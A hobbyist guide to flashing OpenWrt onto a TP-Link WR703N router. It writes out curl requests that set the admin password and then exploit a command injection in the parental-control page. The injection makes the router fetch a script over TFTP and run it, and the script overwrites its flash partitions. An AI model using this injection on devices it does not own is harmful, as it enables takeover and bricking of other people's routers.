Upgrade WR703N V 1.17.1 to openwrt

1. Upgrade your new WR703N V1.17.1 to openwrt.
2.  
3. WARNING: THIS CAN BRICK YOUR DEVICE. DO NOT RELY ON ANY OF THIS INFORMATION.
4. These are just hints how I did it.
5.  
6. If you have no experience with wr703n's. Just buy a MR3020.
7.  
8. You'll need:
9. * A FTP server (in my case 192.168.1.9, I advise to use the same IP or understand what the hell you're doing)
10. * An unix or mac workstation with curl (can be the same box)
11. * A general knowledge of unix commands.
12. * An openwrt image. I make my own but stock 12.09 might work.
13. * A binary busybox for mips static compiled.
14.  
15. The general idea:
16. * Put a script on your tp-link wr703n
17. * Put a better busybox on your tp-link wr703n
18. * Trick the wr703n into executing some commands to run this script.
19. The script:
20. * get the first en second part of the image from tftp
21. * flash the first part of the image (1024k) to the mtd partition named kernel
22. * flash the rest of the image (2819k) to the mtd partition named rootfs
23. * reboot the box with openwrt on it.
24.  
25. First setup the tftp server and put the following files there:
26.  
27. === file aa cut from here ======
28. cd /tmp
29. tftp -gl i1 192.168.1.9
30. tftp -gl i2 192.168.1.9
31. tftp -gl busybox 192.168.1.9
32. chmod 755 busybox
33. ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
34. ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
35. ./busybox reboot -f
36. echo blaaat
37. === /file aa cut to here =======
38. Put the rest also there:
39. * busybox
40. * openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin
41.  
42. Cut the openwrt image in 2 parts. (Yes these commands):
43. These commands can take a while since I had no interrest in calculating a better blocksize.
44. dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
45. dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576
46.  
47. now there are 4 files in your TFTP directory: aa, busybox, i1, i2
48.  
49. Now let's take a router and have it set to the factory settings.
50.  
51. Run these commands on you're workstation.
52. # !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
53. # First it wants a password set, let's do that. (the password is admin42 after this).
54. curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
55. # Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).
56. curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
57. # That being done, now all we need is to just simply exploit the router.
58. # readable it does:
59. # cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
60. # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
61. curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
62. # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
63.  
64. Just wait until it starts to blink, than openwrt is loading. Depending on your image you can reach it on it's mac address.
65.  
66. If you have no experience with wr703n's. Just buy a MR3020.